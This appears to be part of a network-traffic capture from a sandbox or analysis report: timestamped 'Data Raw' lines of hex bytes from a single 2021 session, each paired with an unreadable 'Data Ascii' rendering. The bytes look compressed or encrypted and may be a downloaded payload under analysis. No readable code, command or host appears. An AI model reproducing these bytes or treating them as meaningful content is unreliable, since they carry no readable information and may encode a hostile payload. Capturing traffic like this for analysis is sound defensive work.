cb 35 6c 21 86 af 77 b6 d7 14 86 f1 37 39 f8 3e d6 31 ca 16 6f 91 54 c9 71 92 0d 5c 9d 0c f7 eb 74 49 86 a5 a8 9b c5 85 b0 dd 95 26 73 b8 bd ea 69 0b 3d e2 81 3b e3
                                        Data Ascii: ,E8f^wkVTOv`N3H|%RwZQeg$~[y8p!-Sv"@@^GF^Z}CYB?~P)hu#*G+2*fD!!~M@~KRr&hC'\v5l!w79>1oTq\tI&si=;
                                        2021-09-27 17:14:38 UTC114INData Raw: 17 ee 8c 6d 4d 55 bc fd a1 3c 4b 4d 84 71 c2 84 1b 89 9f ea 70 2c 35 13 b9 70 3e a5 98 97 9d f9 6c 0f c6 11 45 df 58 92 d6 27 dc 52 97 d2 f8 10 c4 12 9a 72 33 02 61 1f cf f9 28 1f 92 8f 7b de 30 d6 3b e3 56 b3 8c a8 b2 7d 71 94 5a 19 a7 18 fa 13 df f8 19 4d 64 bf 4c 10 45 1c ef eb e1 a1 2d 10 56 58 5a 35 33 f6 08 f2 2e c8 bf 6a 4b b1 79 83 b0 cd 0d d2 04 86 7f eb d9 e7 33 c2 36 d3 de 9f 49 7d 2c d7 18 e8 92 bb 7d 59 b6 c8 42 82 ab 90 3c e3 97 ec 7c 80 5a 9d ac 31 63 ac b6 2b 6e a0 3c f6 f4 25 19 4a 10 0b 00 87 53 a5 ca 8b c9 cf 2a 83 3d d7 82 c6 c4 52 f5 5a 9f d7 67 bb 6a 91 89 dd c1 d9 de 8e 42 c6 bf da c9 c8 66 13 50 8f f9 df a1 4d 90 40 de 1c a8 eb c1 5f 1d e7 61 5c f1 56 ca d8 01 f1 89 2f 54 64 51 f8 e0 bb 7a f4 26 76 2a 88 88 96 a4 05 04 ad 93 c8 b6
                                        Data Ascii: mMU<KMqp,5p>lEX'Rr3a({0;V}qZMdLE-VXZ53.jKy36I},}YB<|Z1c+n<%JS*=RZgjBfPM@_a\V/TdQz&v*
                                        2021-09-27 17:14:38 UTC115INData Raw: 63 ab 89 0e f6 dc da f9 60 c4 b9 82 eb fb 39 61 19 e9 11 53 ef 45 5b cf ac 17 01 63 b7 b9 63 58 19 47 37 ee 9a 3a c0 45 6f c9 7b 71 a3 35 fd 11 48 db c3 ad 1c d0 5b f7 d9 76 75 69 9f 5a 8f 93 c3 69 5e cb db 2a e1 cc 8d 58 03 4c 9d 75 5f 6d fc fc df 20 33 c8 ae 9c 36 7f f7 e1 db 6e a9 0c 64 c9 3e 8f 2f 15 e4 db 84 49 76 e5 3a 9c 12 65 c7 ee bd d5 4a 3f b9 21 c4 08 02 41 35 f2 0b 23 c7 28 3f b8 33 5d d3 90 77 72 69 9c b4 39 37 c3 ba ac 87 79 fd 0f 9e 39 6b 60 16 93 3c 3d c9 4c 99 0b 21 23 84 e7 3f b9 85 3e 6f 8b f7 35 02 24 a2 33 4b ce 00 88 45 92 b6 6e 41 76 1d 11 34 b0 51 41 42 18 bb ea 33 78 33 db 07 65 7b d6 2b 5f 58 d8 97 33 c1 b5 24 41 36 59 2a 3c 8c 16 f5 0b 4c b3 0e c5 f5 22 87 38 01 29 4e 6e 00 eb c2 cb 16 a5 b1 74 ef f3 7c 39 e4 4b e3 19 8e 7e 51
                                        Data Ascii: c`9aSE[ccXG7:Eo{q5H[vuiZi^*XLu_m 36nd>/Iv:eJ?!A5#(?3]wri97y9k`<=L!#?>o5$3KEnAv4QAB3x3e{+_X3$A6Y*<L"8)Nnt|9K~Q
                                        2021-09-27 17:14:38 UTC116INData Raw: 66 f5 10 93 b2 a0 c3 2d 60 b7 33 4c 78 c2 0c c6 97 c1 48 48 e9 7c 97 fe 95 08 58 af 68 33 01 33 12 98 22 f1 5d 27 ac 4b 12 26 51 84 40 bb 4b ef c9 50 f8 e2 5e 02 f8 2f a8 4b ca 70 30 e2 0f 93 44 a7 88 9b 6d cf 3e 3c 93 30 a0 4b 67 5f ab 14 85 c2 c3 dd 88 24 a8 e9 45 21 05 51 1d 11 6d 13 5e ec 70 e1 a5 e5 16 07 65 1c 26 d9 20 71 41 59 21 85 0d a1 8c 51 67 cb 49 62 4f 03 d8 c4 59 3d 8a a9 f7 cd df 03 9c d2 b7 29 9e d9 c7 c5 bc cf ee e5 9f 45 09 e5 17 10 3e 9a 1a 1b 8a 17 f4 c4 39 1a 43 11 d5 3b 60 a5 60 cf fa 67 50 ce 59 42 f4 25 f2 58 8d d5 2e 98 b0 4b b0 9a 45 b0 b8 e3 b7 47 33 a5 5e 16 c5 4a e0 11 8d b1 f3 b2 79 f9 c9 ff 1a 3d 15 2c 64 db b9 ed f4 17 52 a4 97 9d ae b7 5b 55 c7 dc ce 58 1f 01 18 46 70 1c d2 ae 5e 8b 4a 17 f0 ef 26 ea 58 de 4b a8 87 ac e9
                                        Data Ascii: f-`3LxHH|Xh33"]'K&Q@KP^/Kp0Dm><0Kg_$E!Qm^pe& qAY!QgIbOY=)E>9C;``gPYB%X.KEG3^Jy=,dR[UXFp^J&XK
                                        2021-09-27 17:14:38 UTC118INData Raw: bf 91 b9 66 c0 eb 02 c5 9f f2 c7 45 5f f2 35 f4 48 82 86 ef 03 d0 19 94 69 d0 fd 4c 22 dd 91 fc 09 97 89 6c d0 d3 2f 39 e3 5d c3 47 b9 b9 77 46 81 56 2d 59 08 d3 06 22 f0 22 93 fc bb 9e 02 68 06 f7 ee f0 bb 30 f7 a9 75 7f 40 31 e7 0c ee 36 d4 ac 70 4e bf 7b 62 9b 1f 07 f7 19 93 f6 46 84 36 2d c8 23 c9 f5 9d 47 65 c3 dd 2b c0 1f 03 51 54 bf 4d ec 98 b6 46 f7 f5 84 0d 5f bf 52 85 ae 3f 7c 92 4d 36 bc ac 13 70 52 28 08 0d c6 05 17 9d 63 a7 c4 91 26 c5 19 b2 d5 db b5 f3 c8 45 32 58 e6 d5 67 97 6f 81 f5 24 c0 c8 dd fe 98 3a be fc dc 39 0c fa 02 70 0c 4f 5c 23 42 46 08 1b 9d de c9 64 18 f6 55 43 ea a8 36 f4 0a 93 8b a3 e3 61 cc 49 29 b0 b3 e8 f0 ea 0a 97 a4 69 ae 2b 12 a8 72 83 9f 6f 36 ce ed 13 13 6c 8c ce 6d 79 1c ab 7f 94 04 09 e0 5f 4f 5f aa bd dc 0b 84 b0
                                        Data Ascii: fE_5HiL"l/9]GwFV-Y""h0u@16pN{bF6-#Ge+QTMF_R?|M6pR(c&E2Xgo$:9pO\#BFdUC6aI)i+ro6lmy_O_
                                        2021-09-27 17:14:38 UTC119INData Raw: 76 84 ab 76 af 65 46 37 eb 09 09 e0 2a 3e dc 53 d6 b5 3d fe 07 1b 5b c1 ad 1e ef e3 f1 d9 7c 7d 78 c7 08 ad 85 d1 33 6c f3 68 2b 43 dd ac 37 52 59 b5 d2 49 65 ff f9 f3 cc 05 c9 a8 80 b9 69 f3 9c 9c 7b bd 1c 4e 68 45 cc 24 3d f1 a6 c3 42 65 ed 3b a2 25 ad d7 eb bb d3 c2 26 47 20 e9 09 23 52 6d a2 1c af fc 2b e9 c4 d7 4d f0 80 7c 6f 52 3a b4 28 38 c0 6c 6e a8 7a e3 0b 16 3e 7a 65 0d 7e 1f 00 fa 58 f5 c0 1f 23 80 e4 e6 ee a6 2a 7f 45 d5 8d 11 21 a8 36 66 16 fd 89 6f 8e 38 6f 7d 6a e3 fa df b9 6a e7 42 09 b4 dd 2b 86 32 fd 12 66 40 cc 09 17 5c d8 8c 1e f4 49 25 6b 5e c7 3c 0d 98 1b ea 7a 5e a2 0b c8 1a 28 df 29 16 3a 50 46 05 ec dd c6 fb a9 89 a6 45 f6 44 aa 32 a0 1c 10 87 69 45 51 d3 01 b9 b1 4a 5a 5e 67 07 2a 21 aa 89 fa 71 1b 28 00 b2 7a 8d bf a4 bd 1d b4
                                        Data Ascii: vveF7*>S=[|}x3lh+C7RYIei{NhE$=Be;%&G #Rm+M|oR:(8lnz>ze~X#*E!6fo8o}jjB+2f@\I%k^<z^():PFED2iEQJZ^g*!q(z
                                        2021-09-27 17:14:38 UTC120INData Raw: a8 79 3e 19 d9 07 a0 14 50 26 6e a7 63 3c 35 58 f6 d7 93 a3 ec df 58 ab 42 5d 02 f6 89 a8 63 ff 7b 1c f5 04 9c 5d 8f 1e 95 72 d9 d6 b0 b8 45 b4 9a f2 4b bf 3d 0e d6 c3 d7 aa 90 b4 ea 4f 34 06 cd 06 05 45 3a 49 eb 67 f0 3e e4 b4 16 63 1f 3a e5 19 d2 41 53 89 bc 22 bc 84 44 7a f2 b3 77 67 88 f6 88 4e 37 13 86 70 ce de 11 9e 4b 98 8a 9e d8 d9 f9 b9 e7 4d ef 3d 5e 1a de ed 05 38 88 16 8f 00 38 f4 c5 2b 2a 5a 23 cb 05 20 3b 71 c1 4f 61 ef c8 79 74 e1 b9 e5 f2 8b de 9d 8c a4 69 35 85 54 a9 9d 7f a6 4a 26 9b af 15 e9 60 e2 01 8b bc 5a 5a 7b ff d4 48 fb c3 ea d2 a9 d9 ba c4 1c 10 79 bc 0d ae d0 e0 5b 5f 6f 11 b1 ba 0a 16 08 7d cb 0d c1 b5 5b b4 0e 18 f0 f8 03 d8 a4 df 61 cd f7 d8 fb ee 03 f6 62 c4 bc e4 c6 e9 3d 65 08 e8 6f 43 82 b9 5c b2 ef 00 6e b6 a4 bd 6b 4c
                                        Data Ascii: y>P&nc<5XXB]c{]rEK=O4E:Ig>c:AS"DzwgN7pKM=^88+*Z# ;qOayti5TJ&`ZZ{Hy[_o}[ab=eoC\nkL
                                        2021-09-27 17:14:38 UTC121INData Raw: 5c 0b e0 80 d6 1e 94 a4 ac c7 53 17 2e e3 4d bb 8a 45 b8 51 69 e1 d6 28 59 13 da 02 cf e6 0e 8a e2 b3 58 f1 76 23 ef 98 06 ab 35 e8 44 72 4c 57 20 e3 08 e5 32 ce b6 9f 4a 8c 5c 8d 88 5c f0 ff 08 91 6e 9e 67 1c 32 c8 5f 30 f4 8c 44 6a 52 0d 05 c9 66 d5 ad 55 b5 40 e2 e4 62 44 e6 fa fc 0d 5f 93 57 8e ae 25 67 90 5f 2a 53 ba 20 5e bd 2d 2d 90 cc 09 14 f7 7b b7 c1 81 c7 e3 26 a0 c3 c7 b9 ff c7 bb 22 71 ea 3a 63 93 47 93 e6 27 e8 fd d8 e1 98 ec 8e d0 de 18 30 47 53 8f f3 af 50 5f 87 46 19 06 a8 cf 2c 55 31 e4 7c 52 e3 c7 07 f5 0a 88 9e f7 47 74 51 f4 e0 b5 7a e8 26 76 36 80 5a 69 89 2a 0d b9 eb 34 a6 58 28 d0 19 11 29 45 9f 4d b5 86 93 1c 51 94 6a d8 e8 58 4f ee 46 99 f4 3a 93 df 0a 88 2c 6a dc 41 fa 62 12 0c 73 51 15 c5 69 86 82 97 f3 8a 08 5a b0 66 2d 0f cd
                                        Data Ascii: \S.MEQi(YXv#5DrLW 2J\\ng2_0DjRfU@bD_W%g_*S ^--{&"q:cG'0GSP_F,U1|RGtQz&v6Zi*4X()EMQjXOF:,jAbsQiZf-
                                        2021-09-27 17:14:38 UTC123INData Raw: 6e ec d9 7c 7d 6b e4 19 8e 0e c7 bf 53 9e 69 2a e1 c6 8d 23 46 42 9d 71 49 7f f5 ed da 13 36 c0 ae cc 35 6e f3 99 9c 6f b8 0a 6c c9 53 a3 cf 14 e0 ac dc 17 45 e9 30 a1 62 66 d5 eb b7 ce 49 09 db 20 e8 10 28 25 4f b4 00 2e b0 0d e8 c5 7f 4f d7 85 6c 6f 52 b1 b0 28 34 c3 c9 aa ab 7a e4 0f 9d 28 7c 73 0f cf 2c 17 cc 5a ca 84 21 23 8a f4 40 eb ac 17 6f 51 fb 39 9c 26 a2 22 4f c1 f8 98 6f 8e a2 e4 f6 6a e2 ef 69 bc 44 50 56 21 76 f4 3a 8c 23 f3 15 45 7b cd 21 4a 4a 55 81 36 da 4a 36 6b 20 59 2a 09 30 1b e0 1a 58 8a c3 d2 0b 29 ba 3f 02 12 60 6a 11 e8 ca 4d ef a4 9d 77 d7 f0 55 ad 0c a3 90 9c 8d 41 58 f0 c2 01 b4 28 65 92 5f 66 1e 18 34 9d b7 c7 78 33 3f 16 3f 77 2f ae 86 be 77 ec 68 a1 c5 9f f8 c2 68 f9 0f 34 de 54 24 c6 f3 10 d4 0a 83 7d cb 15 44 ac d9 90 c3
                                        Data Ascii: n|}kSi*#FBqI65nolSE0bfI (%O.OloR(4z(|s,Z!#@oQ9&"OojiDPV!v:#E{!JJU6J6k Y*0X)?`jMwUAX(e_f4x3??w/whh4T$}D
                                        2021-09-27 17:14:38 UTC124INData Raw: f4 8d 58 61 fa ff 87 95 91 81 49 a3 9b 94 09 5b c1 3d bb 6d ec 99 e6 55 d6 96 ac d6 c7 d8 94 0e cf 69 44 27 18 de 61 95 6c 12 49 c3 8c e4 b3 e9 b6 13 ec bc 53 77 30 71 45 51 81 ef 8c b8 84 46 44 82 40 76 6d ff 5f c5 5f 2f 2d ae f7 de ee 15 88 86 9e 8a 9e d0 cc ed bc d9 fd eb 05 66 0f f6 11 01 29 8a 17 fc 06 14 f2 c2 14 66 51 13 d9 2d 66 3d 6e cb 13 71 e0 d5 58 63 f9 b8 e3 50 85 f0 9a 9c b0 50 92 9b aa a2 99 f6 a4 31 ad b2 a0 13 97 14 f0 1a 93 b1 0b b1 79 f5 d2 6d 14 2e 11 2d 66 d3 b5 1f e3 2a 5a be 76 36 be b7 5f 77 32 cf c2 46 15 05 0a 6e c9 18 cd af bf 9d 75 0f f2 85 ae f7 a6 db 19 d0 8e d8 f1 cc 52 f8 60 ce b7 94 3d fb 39 63 0a fa 65 ab ec 69 49 b0 92 95 00 67 a2 c3 13 22 5a 4c 1f 93 aa 18 c8 35 36 db 7f 75 a4 39 eb 19 cd 99 ee a2 1a 83 ef f7 d9 78 54
                                        Data Ascii: XaI[=mUiD'alISw0qEQFD@vm__/-f)fQ-f=nqXcPP1ym.-f*Zv6_w2FnuR`=9ceiIg"ZL56u9xT
                                        2021-09-27 17:14:38 UTC125INData Raw: 66 45 f0 0e 9f ea a1 d2 2a 5a 00 c2 f4 fd 8a bb ee 57 74 4c 4c 1b d9 0a f4 23 fb c2 1f d2 a1 72 98 85 3d 96 db 25 98 5e ee b8 3e aa c2 30 cc ea 86 6a 50 3f dc 01 e3 02 c4 c8 55 b5 42 ea 84 29 63 cb ff b5 ec 51 b3 f3 9d bd 3a 63 91 60 07 40 ad 39 52 2d 52 98 9d ca 1c 1b 88 f9 93 ec 84 fe db 25 97 77 d6 ae e0 d2 56 0b 70 f2 2b 60 91 06 e8 7f 20 c0 dd c7 f0 08 e1 92 de f8 0d 18 e2 95 8f f3 b0 43 64 bd 44 08 17 9d b4 ac cd 1c f6 6e 5c f8 32 ee d9 04 a4 96 3f 74 ab 42 fe ff ba 41 d2 24 67 27 bd ca 16 3c 28 15 ae e3 27 2d 6a 1a c1 c1 0f 16 4b 5e 40 da 7a 8d 0d 7f af 07 09 ec 72 2f ff 23 99 f4 38 9b a4 41 af 01 6e 95 a2 ef 42 f5 1b 1c 80 0a ed 4e eb 7c 90 d9 e2 65 cc ae 79 3a 07 d8 89 91 11 fc 00 71 b8 6b fe 30 58 f0 de b4 63 c3 dd 52 85 81 31 7c 65 a0 1f 67 e0
                                        Data Ascii: fE*ZWtLL#r=%^>0jP?UB)cQ:c`@9R-R%wVp+` CdDn\2?tBA$g'<('-jK^@zr/#8AnBN|ey:qk0XcR1|eg
                                        2021-09-27 17:14:38 UTC127INData Raw: ed db 17 0f e1 83 94 34 68 d9 f6 e3 f6 a8 08 62 d4 78 56 0b 38 ee 80 dc 75 56 4e 30 b6 0d 79 fc c6 bf c4 49 0b 2d 5e 71 1b 00 47 51 8a 90 06 ee 25 cf da 4b 7c 63 96 68 7b 6d b1 99 2a 32 d2 6e c7 d5 e3 e4 1c 9f 26 45 ff 29 40 33 37 c7 71 c2 fd 22 23 80 f9 6c d2 86 3e 6d 7b 93 50 88 20 a2 26 51 92 64 ac 44 97 93 77 3d 4a 55 ec cb ad 5d 57 6a 24 bc f5 3c ac 5c 89 98 6c 51 cd 3e 0d c7 fd ab 39 fc 54 64 4d fb 5d 3c 0d 8d 01 ce 23 4e a2 0d f9 65 5d 32 3a 16 3e 54 2c 8b cb f0 cf ce bb df 56 11 f4 44 ab 05 bb 34 3d 8f 41 5f 78 bd 79 39 3d 4d 5e 41 25 8e 2c 1d 86 b9 f4 3f 13 dd 02 b2 70 30 a2 af 87 61 f8 46 28 af e1 6b d7 40 40 13 70 42 68 84 cf d5 0f 91 39 75 6e cd 03 56 26 e5 94 d4 18 b8 e3 14 41 5e 04 3d fc 19 36 b6 96 b7 5b 7f da 65 dd 5b 19 d6 03 f4 dc 0c 9b
                                        Data Ascii: 4hbxV8uVN0yI-^qGQ%K|ch{m*2n&E)@37q"#l>m{P &QdDw=JU]Wj$<\lQ>9TdM]<#Ne]2:>T,VD4=A_xy9=M^A%,?p0aF(k@@pBh9unV&A^=6[e[
                                        2021-09-27 17:14:38 UTC128INData Raw: d4 c3 db a8 62 ca 73 44 27 18 c3 76 8b 48 3f 42 cd 7e 8a 93 10 b0 16 62 14 3b d9 1c 73 41 55 a9 fe 74 20 85 42 68 c5 2f ec 42 af d4 e2 40 46 27 a6 f2 cd de 0b a0 eb 9d 8a 98 f3 a3 93 34 ce ee eb 22 3a 94 d3 3c 0e 1e 91 60 22 09 3d f4 c4 27 19 63 2d df 2d 71 13 1b b9 74 71 cc db 4e 35 79 9c ce 5e bc e2 e6 b8 ae 44 96 85 49 8b 98 e1 a6 4c 06 dd de 8e e8 66 f5 05 e9 03 57 9d 76 d9 c1 02 3d 18 10 2d 77 c8 b9 c9 cf 04 54 ba 27 df c1 2e 5a 5f 61 d2 b3 d6 2e 3b 00 48 c7 6d f2 92 44 9c 59 07 d8 d3 29 f6 a0 f5 09 dc 16 d9 fb e0 34 8b fa e1 97 84 17 f7 4f 43 26 fb 7e 55 f2 5c 75 9f eb 16 07 4d c8 c3 f8 22 5a 42 28 99 31 3d ef 31 0c d7 08 55 e3 38 f4 13 2c 95 ea 80 1a f8 68 dc b7 02 e5 6a e4 1d 91 e7 5d 9a 7e fc 4e 35 95 ec ec 26 46 4d 82 66 61 48 f7 ed dd 22 6c b7
                                        Data Ascii: bsD'vH?B~b;sAUt Bh/B@F'4":<`"='c--qtqN5y^DILfWv=-wT'.Z_a.;HmDY)4OC&~U\uM"ZB(1=1U8,hj]~N5&FMfaH"l
                                        2021-09-27 17:14:38 UTC129INData Raw: ac 61 d1 85 5f 8d bc 13 9a fe 08 97 58 7e b1 1e 32 d5 18 e1 f7 8c 44 57 bf a2 9e c8 6c be 71 c3 b5 46 f5 11 96 6b f7 d6 b3 64 5e 93 51 bd 2d 3d 7c 83 52 02 6f af 3f 7e 69 ae 7f 05 cb 18 00 b8 fb b6 c1 8b 42 e1 18 a6 e5 f6 36 e0 cd 45 03 c9 f7 2b 66 a2 44 bb e4 21 c6 f3 5e 9f 0b c5 bf d4 fe 8b 09 c2 52 15 d6 9d 49 6a b0 df 08 11 b7 fe 45 53 1d f6 75 49 c2 85 c9 f4 0c a8 0f 53 cd 63 42 fa df 3d 69 ff 26 fd 04 ba b6 4e 85 b3 15 aa fc 14 16 48 37 ce f8 1a 2d 46 8c 40 dc 50 14 62 ce 83 05 0d ca c3 45 81 ba 02 d1 11 96 96 fb 11 2c 60 b3 9d 50 65 14 1b 03 8a 3f e8 61 e9 7a bc 75 f2 82 54 af 7d 1e 84 cd 13 b4 a6 d6 0b 7c 8b 6b 8a 30 58 f0 e1 0e 4c ee df 4d 8e 83 72 00 fc a7 35 e1 81 e8 31 e8 11 a0 d4 a7 99 96 e8 fa ed 2c 99 65 29 9b e6 5f 8b d7 aa d6 c3 c7 aa 21
                                        Data Ascii: a_X~2DWlqFkd^Q-=|Ro?~iB6E+fD!^RIjESuIScB=i&NH7-F@PbE,`Pe?azuT}|k0XLMr51,e)_!
                                        2021-09-27 17:14:38 UTC130INData Raw: c3 f0 ac 93 bb 23 58 4d 8e 63 08 f5 19 d6 18 fc 98 06 9b f5 b5 60 22 75 0f e2 c1 76 d4 ac ef 57 70 73 eb 33 f4 08 6e 00 fc be 47 6b 0d 72 9c 9a 13 60 f6 08 97 67 fe 9e 33 30 c2 36 e6 77 f2 db 7c 3d d8 27 67 6c ba 51 ce 90 6b e4 ad 93 e8 e6 f0 93 d3 25 9b 51 9d a5 12 51 81 48 2c 68 2b 41 e1 42 2c 05 bc 65 18 04 98 f9 93 ec 99 fe e4 9a b7 c3 d6 8e 9d c5 45 23 42 f9 03 4b b9 6c 90 cc a7 be 40 d9 e1 96 e4 0f d0 de 12 93 e7 7f 9d d5 90 eb 4c 90 46 28 97 bf de d2 4b 14 de 47 41 ea ae e1 76 74 1b 88 2d 50 42 f3 fe ff a7 f3 da 0b 76 07 b7 15 68 a5 29 35 25 f4 34 b7 55 1f e3 e5 10 03 41 0c 3e 43 7b 92 18 77 30 05 09 ea c2 60 ac ab be d4 8e 84 b0 db aa bf 68 b3 bd ec 4a 39 19 1c 86 3d 47 1d 70 7d 96 f7 ac a8 55 af 79 a4 3d e0 02 92 1c 40 26 6e ad 6b 82 38 58 f0 d8
                                        Data Ascii: #XMc`"uvWps3nGkr`g306w|='glQk%QQH,h+AB,eE#BKl@LF(KGAvt-PBvh)5%4UA>C{w0`hJ9=Gp}Uy=@&nk8X
                                        2021-09-27 17:14:38 UTC131INData Raw: d9 ee 54 78 cd 8f 27 66 9e 9d 71 49 ff d0 c0 c9 2e 26 1a ae 96 34 4e 9c 97 9d 6f b6 2f 4e e6 47 cc 28 3f 66 d8 5a 49 76 e5 12 62 0d 6e d4 71 98 e9 5d 07 67 f4 e8 1a 00 63 d8 bf 0a 23 dc 0e c1 e8 77 5c d5 be ee 05 e3 98 b4 2c 12 01 44 ad ab e0 c0 31 89 1f 5a b0 0c 6d 3d 31 63 45 e2 4c 3f 07 a8 c8 46 ff 82 14 ed 2f 64 2f 11 25 82 f4 4e d2 fe 13 4c b5 a7 4e 5d bc e2 ee cb 8d 9d 4f 42 09 a1 d4 12 ab 30 f7 07 47 d7 b7 b8 4d 5d dc a6 e1 da 4b 25 f7 14 72 2e 2b b2 dd e6 0e 4c 82 0b df 0b 23 b4 1a 3e 17 49 6e 17 c4 5b be 71 a5 9d 72 e4 2e 44 ab 1a 2e 39 3d 9f 67 79 8a d3 07 a0 1c 6c 56 5e 66 0b 28 18 a4 9d eb 7a 19 bf 7e 2b 71 2f aa a7 73 63 f8 40 98 e0 b2 e0 f0 60 9d 0c 34 d8 6d eb cd f3 10 ca 38 ad 41 cf 03 4b 24 4e e8 4d 1f 92 8d 4a 02 5f 04 39 79 79 81 81 9d
                                        Data Ascii: Tx'fqI.&4No/NG(?fZIvbnq]gc#w\,D1Zm=1cEL?F/d/%NLN]OB0GM]K%r.+L#>In[qr.D.9=gylV^f(z~+q/sc@`4m8AK$NMJ_9yy
                                        2021-09-27 17:14:38 UTC132INData Raw: bb 70 df c6 17 3d 3b 2d 9a e6 5b 8b ef ad d6 c3 47 a7 21 a5 cc 65 dd 1c dc 1a 31 4d 1c 4d eb 7c ce 9e e1 b4 10 48 8d 50 68 30 71 45 73 78 94 0a b9 1e 67 41 c8 64 56 9c 82 da c4 7f 0c 09 ae f7 d2 d3 3f a5 c4 9f 8c b4 5b b3 74 ac cf ea cf c1 54 0e f6 8b 24 15 9f 28 22 fb 38 f4 c4 18 3d 45 00 dd 33 5f 14 73 c7 eb 5a 4a a1 c8 5b e3 bd c3 ad 9a fd 89 02 95 6c 84 a3 74 5e b5 e3 a6 6a 10 bd a0 17 f6 7d d9 37 9b 99 74 9a fb 81 47 73 1d 39 35 d3 77 d7 a8 7b c7 2b 45 9a 2d 4b bf b7 5b 7f 32 c3 c2 4c 1c 3e 23 6c d8 1a f8 26 3f 05 58 1a f4 de d4 f6 a6 df fd 87 a2 c9 dd c4 d4 f9 60 c4 9a d3 3f e8 3d 79 33 d3 7c 55 eb 6f df cc 70 17 01 63 86 bd 60 23 5a dc 12 c7 ba 3e e2 3e 2b c8 7b 55 e9 33 f4 13 2b b0 ef af 18 fe 44 70 a7 e5 7d 6b e0 39 8f 92 c7 bf c9 d6 45 38 c7 ec
                                        Data Ascii: p=;-[G!e1MM|HPh0qEsxgAdV?[tT$("8=E3_sZJ[lt^j}7tGs95w{+E-K[2L>#l&?X`?=y3|Uopc`#Z>>+{U3+Dp}k9E8
                                        2021-09-27 17:14:38 UTC134INData Raw: e0 aa 35 f1 58 5c 7e 44 33 f2 22 76 5b 48 ad 61 4f 80 53 9d 9a 33 96 db 25 86 5e d1 97 1f 32 c2 10 bc e5 8c 42 63 15 f1 05 c9 6a 90 d7 2a 2c 47 f5 8f 93 64 e7 f0 93 69 7b be 43 bb 9d 18 7d 83 48 0a 3a bd 3f 78 5c 26 29 b1 c8 18 02 b2 e1 c8 58 8a d8 c0 15 94 c2 d6 ae 7a e8 68 32 7b d0 08 67 bb 6c b6 64 31 c0 d9 c5 c9 bf c6 bf d6 f4 94 77 5b 53 8f f7 90 7f 4d 90 46 92 34 9a cc f4 74 39 f7 6a 43 ca 21 db f4 0a 9d 80 05 79 60 42 f8 d5 21 17 66 27 67 25 b7 81 69 a5 29 8f 8f d1 26 91 6f 12 cf e7 10 25 f9 9e 40 da 65 99 34 7a 80 05 0f c0 de 3b 18 bb 98 f0 1c a2 b1 db 8a b6 45 9e af dd 42 32 1a 1c 80 37 58 73 e9 7c 89 fe a4 36 57 af 7f 14 9e b3 8a b5 3c f7 06 49 ac 4b 16 aa 7d dd d3 9d 6b c9 de 52 83 8b f5 12 fc a1 00 6a d7 5c 32 e8 13 aa cf d9 00 97 72 db e0 15
                                        Data Ascii: 5X\~D3"v[HaOS3%^2Bcj*,Gdi{C}H:?x\&)Xzh2{gld1w[SMF4t9jC!y`B!f'g%i)&o%@e4z;EB27Xs|6W<IK}kRj\2r
                                        2021-09-27 17:14:38 UTC135INData Raw: 33 2d 4b d9 63 ec 69 14 e0 a6 e3 fc 64 e1 32 a9 29 46 f9 e9 bd c2 65 a7 39 b9 e9 1a 04 63 06 b5 0a 23 59 0e c4 d7 53 7c 9b 95 68 7b 5a 41 a6 28 32 cb 4b 85 86 78 e5 1a b1 bf 04 fc 0d 6d 39 31 91 4f e2 4c ba 06 ad f7 62 df cd 3f 6b 51 dd c9 03 21 a2 3d 6a fa d3 8b 69 9e 9f ee 03 f3 e3 ee cf 8d 08 45 42 09 24 d0 17 94 14 d7 4b 6c 51 c9 01 47 4e d8 86 29 c9 63 08 6f 31 59 16 8b ec 93 e7 0e 48 82 40 d2 0b 23 31 1e 3b 28 6d 4e 5a ef dd c0 c8 ba 8e 76 c4 e9 60 83 37 b6 1c 16 a7 c7 27 cb d2 07 a4 1c 01 5b 5e 66 8e 2c 1d 9b b9 cb 30 32 39 00 92 32 3c ae 87 b5 46 d0 6d 00 c5 99 d8 50 3e dd 0d 34 dc 6d e4 c0 f3 10 4f 3c a8 7e eb 23 00 0f c8 96 f4 79 81 89 6a c7 7b 2c 14 e1 5c aa b9 3d c7 e4 61 9f 41 08 17 18 d6 18 46 d4 23 89 d3 8c 06 0e 77 0f c4 60 e3 aa 35 f1 75
                                        Data Ascii: 3-Kcid2)Fe9c#YS|h{ZA(2Kxm91OLb?kQ!=jiEB$KlQGN)co1YH@#1;(mNZv`7'[^f,0292<FmP>4mO<~#yj{,\=aAF#w`5u
                                        2021-09-27 17:14:38 UTC136INData Raw: 13 8b 4c eb 65 c6 dd e2 b4 16 f8 2e 03 e3 17 51 2f 52 83 94 2a 25 91 42 6c c5 4e 5e 4a 80 da c2 75 ad 79 37 f6 cd da 37 e7 c7 9f 8a 04 fc e0 ff 8b ef 81 ee 3d 54 2e 5e 04 01 38 91 2e 2a 2a 3a f4 c2 12 8f 35 99 dc 2d 73 19 01 c6 ed 70 56 fa 7c 48 c5 99 93 51 9a fd a9 50 a5 41 96 9a 59 8b 98 e1 a6 4c 06 35 de 8e e8 66 f5 3a e8 98 72 b0 e3 da f3 60 3b 1d 64 2c 77 d7 88 34 f7 06 54 a3 01 9d 92 b5 5b 59 4f 4b bc d5 0a 16 0a 4e aa 1d d2 a4 db b9 74 08 d6 de 59 f7 a6 df 47 43 9a d8 fb fb 21 d1 4d c6 ba 8d 1b 6e 43 fa 1a fe 7a 75 9e 44 5d b2 73 33 2c 75 80 9d 12 22 5a 46 17 01 be 18 c2 21 21 e0 56 77 b5 3b de 95 4d 01 c3 ad 1c d8 1a f7 d9 7c e6 4e c9 0b a8 b3 b3 be 53 f3 48 dc f4 cc 8f 3c 70 65 b0 73 49 63 df 6f a5 91 07 c9 aa b6 41 6f f3 9c 07 4a 84 19 40 eb 30
                                        Data Ascii: Le.Q/R*%BlN^Juy77=T.^8.**:5-spV|HQPAYL5f:r`;d,w4T[YOKNtYGC!MnCzuD]s3,u"ZF!!Vw;M|NSH<pesIcoAoJ@0
